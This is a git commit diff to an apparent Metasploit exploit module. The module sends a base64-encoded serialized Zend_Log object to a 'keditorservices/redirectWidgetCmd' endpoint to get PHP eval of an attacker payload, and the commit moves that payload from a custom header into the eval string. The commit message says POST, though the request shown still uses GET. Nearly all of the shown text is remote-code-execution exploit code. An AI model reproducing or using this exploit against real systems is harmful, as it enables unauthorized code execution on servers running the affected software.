Send payload with POST rather than custom header.
parent
ba6c2117cf
commit
53d4162e7d
|
@ -85,7 +85,7 @@ class MetasploitModule < Msf::Exploit::Remote
|
||||||
end
|
end
|
||||||
|
|
||||||
def exploit
|
def exploit
|
||||||
cmd = "print_r(eval(base64_decode($_SERVER[HTTP_CMD]))).die()"
|
cmd = "print_r(eval(base64_decode('#{Rex::Text.encode_base64(payload.encode)}'))).die()"
|
||||||
|
|
||||||
p = ""
|
p = ""
|
||||||
p << "a:1:{s:1:\"z\";O:8:\"Zend_Log\":1:{s:11:\"\00*\00_writers\";"
|
p << "a:1:{s:1:\"z\";O:8:\"Zend_Log\":1:{s:11:\"\00*\00_writers\";"
|
||||||
|
@ -99,9 +99,6 @@ class MetasploitModule < Msf::Exploit::Remote
|
||||||
res = send_request_cgi(
|
res = send_request_cgi(
|
||||||
'method' => 'GET',
|
'method' => 'GET',
|
||||||
'uri' => normalize_uri(target_uri.path, 'index.php/keditorservices/redirectWidgetCmd'),
|
'uri' => normalize_uri(target_uri.path, 'index.php/keditorservices/redirectWidgetCmd'),
|
||||||
'headers' => {
|
|
||||||
'Cmd' => Rex::Text.encode_base64(payload.encode)
|
|
||||||
},
|
|
||||||
'vars_get' => {
|
'vars_get' => {
|
||||||
'kdata' => Rex::Text.encode_base64(p)
|
'kdata' => Rex::Text.encode_base64(p)
|
||||||
}
|
}
|
||||||
|
|
Loading…
Reference in New Issue